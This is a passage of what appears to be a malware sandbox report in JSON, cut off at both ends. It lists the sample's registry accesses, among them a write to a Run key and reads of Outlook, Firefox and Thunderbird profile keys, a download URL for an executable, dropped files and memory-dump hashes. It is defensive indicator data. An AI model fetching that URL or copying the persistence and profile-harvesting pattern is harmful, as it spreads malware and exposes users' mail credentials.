"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\VBA\\Monitors", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0413e2ad850e7146953cbb4c2672287e", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1b5aad0cdb629e49a2c6203d4a6a948a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1dab3177c2ac33448a4fe54b862a329e", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\2a7b899b94a04042a46a1cd96dc2a18c", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7a302ee0804dab4ba930ea4351b9b4ac", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7df1ae4ad074c146bb02f647b97dd78e", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "doc2th.com/tin/off.exe", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/247f0b1576c24e50830f6ee326dce494c6ba478d", "file_type": "created_file", "id": "file_3", "md5_hash": "437efd63bf864669ef4312750c25c462", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe", "sha1_hash": "247f0b1576c24e50830f6ee326dce494c6ba478d", "sha256_hash": "c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a", "size": 237568, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da6159d0bb110771e34af83252e0c0d5929d7e3a", "file_type": "created_file", "id": "file_4", "md5_hash": "79f341fd3ffdd288d176c7ff38c456c3", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dff8ff715eb6fd8eb1.tmp", "sha1_hash": "da6159d0bb110771e34af83252e0c0d5929d7e3a", "sha256_hash": "71ede8a3db6c3437883e1ce09890aa1789ee8a4777263b8f5cd0324d493ed884", "size": 6144, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4d2ee9b5ef7aa537db4ef414ae9854426f8ae578", "file_type": "created_file", "id": "file_5", "md5_hash": "9679973c4495843a13589d438c7f9677", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\olologim.jpeg", "sha1_hash": "4d2ee9b5ef7aa537db4ef414ae9854426f8ae578", "sha256_hash": "e3925df9b65909ca5128b30cd53f1c106cd1cf3b7d36a26be06091dbab712ad8", "size": 76788, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/495590c98ccbfcbc17a622e29912d4ad4009b36e", "file_type": "modified_file", "id": "file_2", "md5_hash": "5e96b592b960ec8b481f9a75f6d60e3b", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\b9mx3v6b\\foobaz[1].txt", "sha1_hash": "495590c98ccbfcbc17a622e29912d4ad4009b36e", "sha256_hash": "b17c0528463b2e7c191c2adaec4135848564597531cb9b7554b8fc80d1ac0c45", "size": 335, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5f8d3d25c60d5c9ecf2627422c77c7a895c67d4e", "file_type": "modified_file", "id": "file_6", "md5_hash": "538010a9ee2bd83dce6e6181bcda3df3", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "sha1_hash": "5f8d3d25c60d5c9ecf2627422c77c7a895c67d4e", "sha256_hash": "9f70b9e987c662a9555182f299b9196ae5b3bb5e8128dd75e5ac3e6f49632b60", "size": 65536, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3de6de86748edb5d0f9c7ca464a2301ee03b753b", "file_type": "modified_file", "id": "file_7", "md5_hash": "52e5f12a1c455d32f6cafd01a89ad68e", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "sha1_hash": "3de6de86748edb5d0f9c7ca464a2301ee03b753b", "sha256_hash": "d2b2d583e7f30d11cb2daeae50b2617676783ed6cd360e0b47209d9787e224a2", "size": 32768, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/bc0c688702dc593e4a8448d723dd9311ee177aba", "file_type": "modified_file", "id": "file_8", "md5_hash": "d35b4ef54f22a55d2252d7c75217680e", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "sha1_hash": "bc0c688702dc593e4a8448d723dd9311ee177aba", "sha256_hash": "6871ece75631267dfa058661f117eda144a1f1936468df1d8cf7eb1f4b11474d", "size": 49152, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000333-addr_0x0000000000700000-size_0x0000000000004000-perm_rw.bin", "filename": "process_00000001-region_00000333-addr_0x0000000000700000-size_0x0000000000004000-perm_rw.bin", "id": "proc_dump_9", "md5_hash": "8a6827fbd2f841fdf67dcd1b3d4b9a48", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0d136bc61da3f8747af7ee3cf7f97fa74abeaf10", "sha256_hash": "42ef950e7c3d05aa5c316b1591c1a7f6d99f5b00f01a3027f39dcb64bcc0f129", "size": 16384, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000335-addr_0x0000000000730000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000335-addr_0x0000000000730000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_10", "md5_hash": "13cfbc5c0a1e68327a00db61eee7505b", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5079ef0bb134a07343f839a8638675ffe428111c", "sha256_hash": "c1af339ff32c1ea69b7f72cc18a4c6cc2c2fae71238fe4d331ab40c8f4f289f6", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000336-addr_0x0000000000750000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000336-addr_0x0000000000750000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_11", "md5_hash": "e08155eed7f270e80f0b74a4ba086cbc", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "deb948fd2366472b303a04a02127e2cbefefb7d8", "sha256_hash": "89c8c1c094d5ab568316fd9613b5e5f3767bcc7e16d9c092de1670c34bbae1ea", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000338-addr_0x0000000000ef0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000338-addr_0x0000000000ef0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_12", "md5_hash": "a6d49c5ecb5f66641856a882ada76bfb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3d1f07414698e1673c1f964ac5038a2236f679e2", "sha256_hash": "6a09210a12a4097cdc385ae5adb6bc5aedb2e80bf8a7b38f2af531fe4871bb6c", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000339-addr_0x0000000000f10000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000339-addr_0x0000000000f10000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_13", "md5_hash": "c362fc9e52bb18bda34293b1016c99cb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "da31171d6db206fc50c6b8880e60c67a621fb9a3", "sha256_hash": "dfe446a947ed3c58cb34779a8a13b6883da163d0c7e620be97b68cf353a49cd2", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000341-addr_0x0000000002110000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000341-addr_0x0000000002110000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_14", "md5_hash": "62be6fba9e39af8e3ac2554f7623b988", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4d37f6bb02385ea9a76eca2cde95f0de497f140c", "sha256_hash": "8d9a52e37f1d53d3dc9582626e88cac5d6ab0e1efa3c0c5890a2e16f8d167cf4", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000342-addr_0x0000000002130000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000342-addr_0x0000000002130000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_15", "md5_hash": "6456e83f2e123493c7722f3fa4835489", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bba67a294fd375f39ba1a4806dae660e65847028", "sha256_hash": "8f0c0ac34c3a304103c13e775390082989a573de703ae188fcce8420e4c571a7", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000343-addr_0x0000000002180000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000343-addr_0x0000000002180000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_16", "md5_hash": "1cecc060f54ebcf4bd02930d8b4ba3f5", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b14fe942c0cf5067314545d7273c1f28596bd918", "sha256_hash": "9f0000116b97f2b2a78a0c7ce4e31acea3e66cc1b62b7d1f02f34888f4a2ebc9", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000344-addr_0x00000000021c0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000344-addr_0x00000000021c0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_17", "md5_hash": "cc19612d31e652cb5d470389aaa570f8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a2634c0063d45b9877ff288ec629203117d6481a", "sha256_hash": "eafbc44035c468fdfc71ce1cfc575edd978eb082cbf9db799056dc23054410cc", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000345-addr_0x00000000021e0000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000345-addr_0x00000000021e0000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_18", "md5_hash": "2feb0523686ccc395551ee2b022ec5e5", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2d937caa005e66d5b670c9003163c720cf795c62", "sha256_hash": "0a5077118f2f1d36ccf6dadca5ab8641fd6311ce864f13c94ed81a7d1751341f", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000346-addr_0x0000000002270000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000346-addr_0x0000000002270000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_19", "md5_hash": "7b7d0a66d963c50d72f4e8e1448f7a15", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3800ae56c9ebe74dca087f0416598ef23e3bf49e", "sha256_hash": "c98e1c9b54457be7a1296ae81541bad040983bea78a3d7eb34ed6c27127d1bcf", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000347-addr_0x0000000002670000-size_0x0000000000021000-perm_rw.bin", "filename": "process_00000001-region_00000347-addr_0x0000000002670000-size_0x0000000000021000-perm_rw.bin", "id": "proc_dump_20", "md5_hash": "588fd86980cb8df1dc05ba967280f33a", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0a63447a467c07bd09ff29a0c19974bc9564c5d5", "sha256_hash": "9c1db187fbe4f7fc0bf96009ee7e0206234228c0ad7e4612d728e9bb8aa4e7b2", "size": 135168, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000709-addr_0x00000000081d0000-size_0x00000000004b2000-perm_rw.bin", "filename": "process_00000001-region_00000709-addr_0x00000000081d0000-size_0x00000000004b2000-perm_rw.bin", "id": "proc_dump_90", "md5_hash": "98a39b483079be0c19637295e2411154", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "466da0964a3b4e8160e51c607daf3906dc633c0a", "sha256_hash": "c75d3c5ca9519eef71445bb90484bf4821f2d00f0118e120a8739f553ed2796d", "size": 4923392, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000718-addr_0x0000000003510000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000718-addr_0x0000000003510000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_91", "md5_hash": "9d7987d6491b8f39032897639e6846ac", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7c032dd7808bef7ddad75a848908235c89a45d35", "sha256_hash": "c1e266485cf283c30d8ce37eed86c43b2e47c1d11e67e886237fa38107bd7278", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000720-addr_0x0000000003570000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000720-addr_0x0000000003570000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_92", "md5_hash": "99fbf11e9f2da0ba9c8b172d939ca936", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b06dee152339c8ea3ba54a783905df762fda2214", "sha256_hash": "194525d500ad0f501369d28027ad8b19bbc5f40b7d9fd2dbb539d8aa22cc5cd9", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000721-addr_0x0000000003580000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000721-addr_0x0000000003580000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_93", "md5_hash": "42eed3c2bc65ae9adb54c634cb45001c", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "78ead65b8d742fe4c64b15455fe60e8f3b1fcac2", "sha256_hash": "31d3805e61800120ba7ec44e1d3ee94ef1b538bd09074907520878f897cbd81c", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000722-addr_0x0000000003590000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000722-addr_0x0000000003590000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_94", "md5_hash": "b3aa42f027ad81752afb94397b38e7c7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "33b88b08bdc9b612413a29877372233fe3f9a956", "sha256_hash": "1bdf95153002ec049d1aaa6f0f3594773b47cb6a57501072de555edd53c9e8e3", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000724-addr_0x00000000035b0000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000724-addr_0x00000000035b0000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_95", "md5_hash": "b3aa42f027ad81752afb94397b38e7c7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "33b88b08bdc9b612413a29877372233fe3f9a956", "sha256_hash": "1bdf95153002ec049d1aaa6f0f3594773b47cb6a57501072de555edd53c9e8e3", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000726-addr_0x00000000036e0000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000726-addr_0x00000000036e0000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_96", "md5_hash": "417bf6ab096d951efbe29db11587ee76", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "238354290ffaee07475d8ec4c243b3dc3bce8d81", "sha256_hash": "1084a0ba52d5471f8f1f82dbc405f172241ff5bd97e6453208ce5d113f0cae0a", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000728-addr_0x0000000003700000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000728-addr_0x0000000003700000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_97", "md5_hash": "f6b068f325c912a36d0925d38b46f45a", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6ff7f06c21a5761101be57a9a59896aa3ad3cbdd", "sha256_hash": "a32e1c820cbd803b1c8ee6a67fc706d17c8042f3a494484223bd67401e02bb7d", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000735-addr_0x0000000000730000-size_0x0000000000031000-perm_rw.bin", "filename": "process_00000001-region_00000735-addr_0x0000000000730000-size_0x0000000000031000-perm_rw.bin", "id": "proc_dump_98", "md5_hash": "65c062f9b28cf971640299d852b92504", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "be7f78141b3364f74d23cbb8dc6907bdaa86c7ec", "sha256_hash": "bb5c3d381483d03e323d93e8ba392a32cf1753eaf428a34891128a896e91700f", "size": 200704, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000741-addr_0x0000000007230000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000741-addr_0x0000000007230000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_99", "md5_hash": "5665eac7c89622a34464deb76a32c3d8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4488e5db9f8e9b95c7b72e6b8e5abd550cd94b50", "sha256_hash": "4ba511c5bac5091b609447b2ae1f19ea92f42922484dad4c32d98e6a2d83df22", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000745-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000745-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_100", "md5_hash": "645b7ffda947df5883898f8e478ec252", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "793105402471e13e75f6ee4133706fed6d792fb5", "sha256_hash": "24c02a184ef14b832b19f688f96fd8fe745df97730168005aa81819cd0641074", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000759-addr_0x0000000007490000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000759-addr_0x0000000007490000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_101", "md5_hash": "c26443770922a8f2148d4cf37a871e7f", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "85a6085a6c4032418c22b54b77bf63e3effc6405", "sha256_hash": "36b4fe3de07340618c63ef985642c1a2e313cf197efd86dab841a26a5f823414", "size": 184320, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000760-addr_0x0000000009460000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000001-region_00000760-addr_0x0000000009460000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_102", "md5_hash": "d1c2f5c1085dd11edceabb9e90f56380", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9f9cc198c472f39e5d52135bde40531933a807bf", "sha256_hash": "5cf112c7865f75d2834ab4c8acc62e6253202702b3528faac548fd98e37a859a", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000352-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000002-region_00000352-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_21", "md5_hash": "8103b07082ffff36f8ed610d8fcab6e5", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b6a001fa1e148037e28cbe3655adea52cb56b770", "sha256_hash": "8537f19c87a3e5c6de0a82025875a1ffcba4164f2a8dc846ace576234249b384", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000353-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000353-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_22", "md5_hash": "c1586a260bfa00fb03057dde484b54c4", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c51e1ef53aca0ccc15897b320fedcbbca32f6e17", "sha256_hash": "eb66a5f395be771376b23e451db606701a88b1667ec4ab4c60b2c87195cbc295", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000360-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000360-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_23", "md5_hash": "f0c018588fb97b4381060a11ffecb6c5", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ab5dd4e0d80806fe5bbf5bdcc00d60bfcce818de", "sha256_hash": "b2c16efaea2e1e2a189984bc72e68155906ba1422b6836b8c9e882d290041cf3", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000361-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000361-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_24", "md5_hash": "9adf63fc24d929850431d36f9c1311d0", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "662a528a7a4b385e5f47f1470f666214d8054126", "sha256_hash": "cd1ca2c1847ac2b3dfc7679144b01b285eb27d3bdc0dd30ece10462039b7239c", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000362-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000362-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_25", "md5_hash": "bbb105a4536075877d824eabaea6760d", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "945e06dd246c7e6d655a5b1ebb1175a43dcf75ea", "sha256_hash": "88aab6d69b8e6849db76603c4760085c2d4bf184b92bb69bfb3737c92e9c4827", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000380-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000002-region_00000380-addr_0x0000000000200000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_26", "md5_hash": 